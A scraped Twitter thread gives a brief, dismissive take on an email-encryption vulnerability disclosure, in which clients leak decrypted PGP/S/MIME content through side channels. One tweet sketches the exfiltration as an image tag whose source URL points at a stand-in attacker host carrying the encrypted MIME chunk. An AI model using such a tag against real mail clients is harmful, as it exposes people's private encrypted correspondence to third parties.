Infosec disclosure dramapic.twitter.com/r4LE1kuUar
TL;DR email clients / PGP / S/MIME integration being stupid and leaking stuff via side channels (like image embeds <img src="http://attacker.com/_encrypted email MIME chunk_> & malleability in obsolete PGP crypto). Enigmail 2.0 is not vulnerable. Yet another overhyped clickbait vuln.
-
-
This Tweet is unavailable.
-
it's the same implementation, just with the major difference that in GPG you can only show the contents and in e-mail clients you can actually show external images/run code
End of conversation
-
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.
